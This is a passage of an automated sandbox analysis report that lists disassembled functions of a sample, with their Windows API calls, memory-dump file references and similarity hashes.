                                    Function 008F182D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 008F184C
                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 008F1872
                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 008F18A2
                                    • InternetCloseHandle.WININET(00000000), ref: 008F18E9
                                      • Part of subcall function 008F2483: GetLastError.KERNEL32(?,?,008F1817,00000000,00000000,00000001), ref: 008F2498
                                      • Part of subcall function 008F2483: SetEvent.KERNEL32(?,?,008F1817,00000000,00000000,00000001), ref: 008F24AD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                    • String ID:
                                    • API String ID: 3113390036-3916222277
                                    • Opcode ID: 7c4f2e7f7a95294f8d39c38586a54d4d6cf922ed1d530f75bd6122e574a6f3ef
                                    • Instruction ID: 10379b308eb493d2889ca76ebfe1ed71137b017da6b0542aaa5bacd7a1170f80
                                    • Opcode Fuzzy Hash: 7c4f2e7f7a95294f8d39c38586a54d4d6cf922ed1d530f75bd6122e574a6f3ef
                                    • Instruction Fuzzy Hash: 0D21B0B151420CBFEB119B74CD89EBB77EDFB48784F10413AF605D6640EA608E0567A2
                                    Function 009063E7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00881D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00881D73
                                      • Part of subcall function 00881D35: GetStockObject.GDI32(00000011), ref: 00881D87
                                      • Part of subcall function 00881D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00881D91
                                    • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00906461
                                    • LoadLibraryW.KERNEL32(?), ref: 00906468
                                    • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 0090647D
                                    • DestroyWindow.USER32(?), ref: 00906485
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                    • String ID: SysAnimate32
                                    • API String ID: 4146253029-1011021900
                                    • Opcode ID: 20810bbfe68003d201a2fb020cefed74bf3eefdb92fea5f49f3da07b039cb6cd
                                    • Instruction ID: 13b54b09b57d1d34e02a331f80129bbf7abe9e79fc8561a886182292c4abbdfb
                                    • Opcode Fuzzy Hash: 20810bbfe68003d201a2fb020cefed74bf3eefdb92fea5f49f3da07b039cb6cd
                                    • Instruction Fuzzy Hash: B2218872210209AFEF108FA4DC90EBA77ADEF59368F104629FA10920E0D7719C62A760
                                    Function 008E6D9C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetStdHandle.KERNEL32(0000000C), ref: 008E6DBC
                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 008E6DEF
                                    • GetStdHandle.KERNEL32(0000000C), ref: 008E6E01
                                    • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 008E6E3B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: CreateHandle$FilePipe
                                    • String ID: nul
                                    • API String ID: 4209266947-2873401336
                                    • Opcode ID: af747ddc6b7467789f59490795de7e86db51ef69a1d395f6787b12fa28deb495
                                    • Instruction ID: 6eaaa3d4352091ae24e18216593074f8e3300a46c8881e0d62cf4b3ed90bbe26
                                    • Opcode Fuzzy Hash: af747ddc6b7467789f59490795de7e86db51ef69a1d395f6787b12fa28deb495
                                    • Instruction Fuzzy Hash: DB21977470034AAFDB209F2ADC05A5977F4FF667A0F204619FCA1D72D0E77199609B50
                                    Function 008E6E6A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetStdHandle.KERNEL32(000000F6), ref: 008E6E89
                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 008E6EBB
                                    • GetStdHandle.KERNEL32(000000F6), ref: 008E6ECC
                                    • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 008E6F06
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: CreateHandle$FilePipe
                                    • String ID: nul
                                    • API String ID: 4209266947-2873401336
                                    • Opcode ID: 095a4cf837867faf3eebe9ef60b0117b35ed6138ceb3bc15c86d148ebce69a52
                                    • Instruction ID: 2c4e2059002c1b2a2e4040f6721c37794b8ac355745e0a9216c8f19f7cf9ad5a
                                    • Opcode Fuzzy Hash: 095a4cf837867faf3eebe9ef60b0117b35ed6138ceb3bc15c86d148ebce69a52
                                    • Instruction Fuzzy Hash: 1921B275500346DBDB209F6ACC04AAA77A8FF66764F300A59F8B0D32D0E77099608B21
                                    Function 008EAC40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                                    Download Yara Rule
                                    APIs
                                    • SetErrorMode.KERNEL32(00000001), ref: 008EAC54
                                    • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 008EACA8
                                    • __swprintf.LIBCMT ref: 008EACC1
                                    • SetErrorMode.KERNEL32(00000000,00000001,00000000,0090F910), ref: 008EACFF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: ErrorMode$InformationVolume__swprintf
                                    • String ID: %lu
                                    • API String ID: 3164766367-685833217
                                    • Opcode ID: d4ba6a14be470e900384f710a3f498b8caf81287805122be8c1eef9c575d196b
                                    • Instruction ID: 52ce9aecfdaa807b3781158ffebfc8f4f59fbba54980406c3ee0850fbf2c0244
                                    • Opcode Fuzzy Hash: d4ba6a14be470e900384f710a3f498b8caf81287805122be8c1eef9c575d196b
                                    • Instruction Fuzzy Hash: 8221A130A00109AFCB10EF69C945DAE7BB8FF89714B004069F809EB251DA31EE41DB22
                                    Function 008E1AE8 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON
                                    Download Yara Rule
                                    APIs
                                    • CharUpperBuffW.USER32(?,?), ref: 008E1B19
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: BuffCharUpper
                                    • String ID: APPEND$EXISTS$KEYS$REMOVE
                                    • API String ID: 3964851224-769500911
                                    • Opcode ID: f3c3edf70853b6115b081956fd33cb3821661d400257d931cbe7f6d163a1db03
                                    • Instruction ID: c8347beba03a2e8a5f75d806ea8efb8c19651231d15c454f5c709e14d32427c5
                                    • Opcode Fuzzy Hash: f3c3edf70853b6115b081956fd33cb3821661d400257d931cbe7f6d163a1db03
                                    • Instruction Fuzzy Hash: 7B113C319102588FCF00EF58D8558AEB7B4FF66304F1444A5E825A7691EB326906CF51
                                    Function 008FEB55 Relevance: 7.7, APIs: 5, Instructions: 247COMMON
                                    Download Yara Rule
                                    APIs
                                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 008FEC07
                                    • GetProcessIoCounters.KERNEL32(00000000,?), ref: 008FEC37
                                    • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 008FED6A
                                    • CloseHandle.KERNEL32(?), ref: 008FEDEB
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                    • String ID:
                                    • API String ID: 2364364464-0
                                    • Opcode ID: 48ceddb24dfc770d38fa8b112c1968b49ae7df7f5a550ecaadb8029a452f444b
                                    • Instruction ID: 11d405a25e9b6118a3cf0b465c622f0f43a12fc61b205b10f5f6d3b1ee6aedd4
                                    • Opcode Fuzzy Hash: 48ceddb24dfc770d38fa8b112c1968b49ae7df7f5a550ecaadb8029a452f444b
                                    • Instruction Fuzzy Hash: 438150716043019FD760EF28C886F2AB7E5FF48724F14882DF99ADB292D670AD40CB52
                                    Function 00900037 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00887DE1: _memmove.LIBCMT ref: 00887E22
                                      • Part of subcall function 00900E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,008FFDAD,?,?), ref: 00900E31
                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 009000FD
                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0090013C
                                    • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00900183
                                    • RegCloseKey.ADVAPI32(?,?), ref: 009001AF
                                    • RegCloseKey.ADVAPI32(00000000), ref: 009001BC
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                    • String ID:
                                    • API String ID: 3440857362-0
                                    • Opcode ID: fa14d70995dbe088a0bccf35f6b1fa13d2112ea83f31483f0375bf68bd7de0e0
                                    • Instruction ID: baf81103bf9a5118eeb73164cb9fca36d44beec7e294f0d17978f1dae1bc174a
                                    • Opcode Fuzzy Hash: fa14d70995dbe088a0bccf35f6b1fa13d2112ea83f31483f0375bf68bd7de0e0
                                    • Instruction Fuzzy Hash: BC513771208204AFD714EF68D891F6AB7F9FF84314F44492DF596872A2DB31E944CB52
                                    Function 008FD8C8 Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00889837: __itow.LIBCMT ref: 00889862
                                      • Part of subcall function 00889837: __swprintf.LIBCMT ref: 008898AC
                                    • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 008FD927
                                    • GetProcAddress.KERNEL32(00000000,?), ref: 008FD9AA
                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 008FD9C6
                                    • GetProcAddress.KERNEL32(00000000,?), ref: 008FDA07
                                    • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 008FDA21
                                      • Part of subcall function 00885A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,008E7896,?,?,00000000), ref: 00885A2C
                                      • Part of subcall function 00885A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,008E7896,?,?,00000000,?,?), ref: 00885A50
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                    • String ID:
                                    • API String ID: 327935632-0
                                    • Opcode ID: 006e783e5455dd1304669354466e41bcdfca8e48b5a43959de9c81fa1c96eab3
                                    • Instruction ID: 36b90fa258945a643a8fde642d40ebb0a4104fd0c28f34d3a9ea9164659db84b
                                    • Opcode Fuzzy Hash: 006e783e5455dd1304669354466e41bcdfca8e48b5a43959de9c81fa1c96eab3
                                    • Instruction Fuzzy Hash: 8051F735A04219DFCB00EFA8C8949ADBBF5FF09324B148165EA59EB312D731AD45CF91
                                    Function 008EE571 Relevance: 7.6, APIs: 5, Instructions: 135COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 008EE61F
                                    • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 008EE648
                                    • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 008EE687
                                      • Part of subcall function 00889837: __itow.LIBCMT ref: 00889862
                                      • Part of subcall function 00889837: __swprintf.LIBCMT ref: 008898AC
                                    • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 008EE6AC
                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 008EE6B4
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                    • String ID:
                                    • API String ID: 1389676194-0
                                    • Opcode ID: f05a23f473d9d01a8e60dda7c85e9be6c3b522e4b8684eebe4bf0c714fa7ffa5
                                    • Instruction ID: 05216122b1f4f246047a3d154f714b27cfd66397b226fe23956dd0b1273735f8
                                    • Opcode Fuzzy Hash: f05a23f473d9d01a8e60dda7c85e9be6c3b522e4b8684eebe4bf0c714fa7ffa5
                                    • Instruction Fuzzy Hash: E0510835A00106DFCB01EF69C9819AEBBF5FF09314B1480A9E859EB361CB31ED11DB51
                                    Function 0090A056 Relevance: 7.6, APIs: 5, Instructions: 130COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 56e025e1b404682f9bcd244ec60f6a54c6c46b83691e2e6a4f43bb43716c3b59
                                    • Instruction ID: bdf3f06fe8b257d97f263f3af1b5fd49d3cd3251f52e94056547b10fd2a5f543
                                    • Opcode Fuzzy Hash: 56e025e1b404682f9bcd244ec60f6a54c6c46b83691e2e6a4f43bb43716c3b59
                                    • Instruction Fuzzy Hash: 0B41B43590C308AFD760DF68CC58FA9BBBCEB09320F150565F815A72E1C770AE41EA91
                                    Function 00882344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetCursorPos.USER32(?), ref: 00882357
                                    • ScreenToClient.USER32(009457B0,?), ref: 00882374
                                    • GetAsyncKeyState.USER32(00000001), ref: 00882399
                                    • GetAsyncKeyState.USER32(00000002), ref: 008823A7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: AsyncState$ClientCursorScreen
                                    • String ID:
                                    • API String ID: 4210589936-0
                                    • Opcode ID: 996888de8d44a930a72a73cd8e02b77f4fe7e6ee8d014bf6eca68bb6d7fb00b3
                                    • Instruction ID: 440281961820a9876a15ee4c577c06db6952022d305d3f06451668204c31d90a
                                    • Opcode Fuzzy Hash: 996888de8d44a930a72a73cd8e02b77f4fe7e6ee8d014bf6eca68bb6d7fb00b3
                                    • Instruction Fuzzy Hash: 72416E75608109FFCF25AF68C854AE9BB75FB05364F20435AF829D23A0CB349990DB91
                                    Function 008D63AA Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 008D63E7
                                    • TranslateAcceleratorW.USER32(?,?,?), ref: 008D6433
                                    • TranslateMessage.USER32(?), ref: 008D645C
                                    • DispatchMessageW.USER32(?), ref: 008D6466
                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 008D6475
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Message$PeekTranslate$AcceleratorDispatch
                                    • String ID:
                                    • API String ID: 2108273632-0
                                    • Opcode ID: 2f45089d4a7a7f78835897b248ce86c1e7fa860e4befa32fb2ff7aacb33584c9
                                    • Instruction ID: 2d2883c9ae9d0765a7b38458d6d8fb171d24625e84f715c9f5de0e1039384031
                                    • Opcode Fuzzy Hash: 2f45089d4a7a7f78835897b248ce86c1e7fa860e4befa32fb2ff7aacb33584c9
                                    • Instruction Fuzzy Hash: 5131F23091460EAFDB249FB48C44FB67BA9FB01314F150367E421C22A2F7659469EB60
                                    Function 008D8A1F Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetWindowRect.USER32(?,?), ref: 008D8A30
                                    • PostMessageW.USER32(?,00000201,00000001), ref: 008D8ADA
                                    • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 008D8AE2
                                    • PostMessageW.USER32(?,00000202,00000000), ref: 008D8AF0
                                    • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 008D8AF8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
